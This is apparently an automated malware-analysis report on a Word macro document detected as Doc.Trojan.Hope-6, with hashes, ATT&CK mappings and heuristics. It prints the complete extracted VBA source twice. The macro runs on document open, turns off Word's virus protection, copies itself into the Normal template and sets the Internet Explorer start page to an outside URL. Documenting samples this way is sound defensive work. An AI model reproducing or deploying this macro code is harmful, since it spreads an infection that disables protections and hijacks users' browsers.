Office (OLE) malware analysis — malicious · 0b91d77bb9e0730f

MALICIOUS

Office (OLE)

31.5 KB Created: 1999-09-12 05:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 5d1125534a7ce333a34e8e9b8ff495f2 SHA-1: b80827051ea21f1e277004b35ba97ef607496b58 SHA-256: 0b91d77bb9e0730f4379068da7e7c07626118e3d057ca1b895c7ddd535cad2b5

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script modifies the Internet Explorer start page to 'http://altern.org/lyskovick', indicating a likely attempt to redirect the user to a malicious site. The presence of the 'Doc.Trojan.Hope-6' ClamAV detection further supports its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.Hope-6 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hope-6
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://altern.org/lyskovick In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 995 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	995 bytes
SHA-256: `20c330c20f362526f9cdb15a7f275af98699b25475487d900e2f2b9d541f61cc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Options.VirusProtection = 0: Options.SaveNormalPrompt = 0: Options.ConfirmConversions = 0 If ThisDocument = NormalTemplate Then Set TI = ActiveDocument Else Set TI = NormalTemplate VM = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) Set IR = TI.VBProject.VBComponents.Item(1).CodeModule IR.DeleteLines 1, IR.CountOfLines: IR.AddFromString VM If TI = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "http://altern.org/lyskovick" End Sub 'Schönheiten Von Lys Kovick... Für Mein Engel!

SHA-256: 20c330c20f362526f9cdb15a7f275af98699b25475487d900e2f2b9d541f61cc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Options.VirusProtection = 0: Options.SaveNormalPrompt = 0: Options.ConfirmConversions = 0
If ThisDocument = NormalTemplate Then Set TI = ActiveDocument Else Set TI = NormalTemplate
VM = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
Set IR = TI.VBProject.VBComponents.Item(1).CodeModule
IR.DeleteLines 1, IR.CountOfLines: IR.AddFromString VM
If TI = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "http://altern.org/lyskovick"
End Sub 'Schönheiten Von Lys Kovick... Für Mein Engel!

Open this report in the interactive analyzer, or submit your own file for analysis.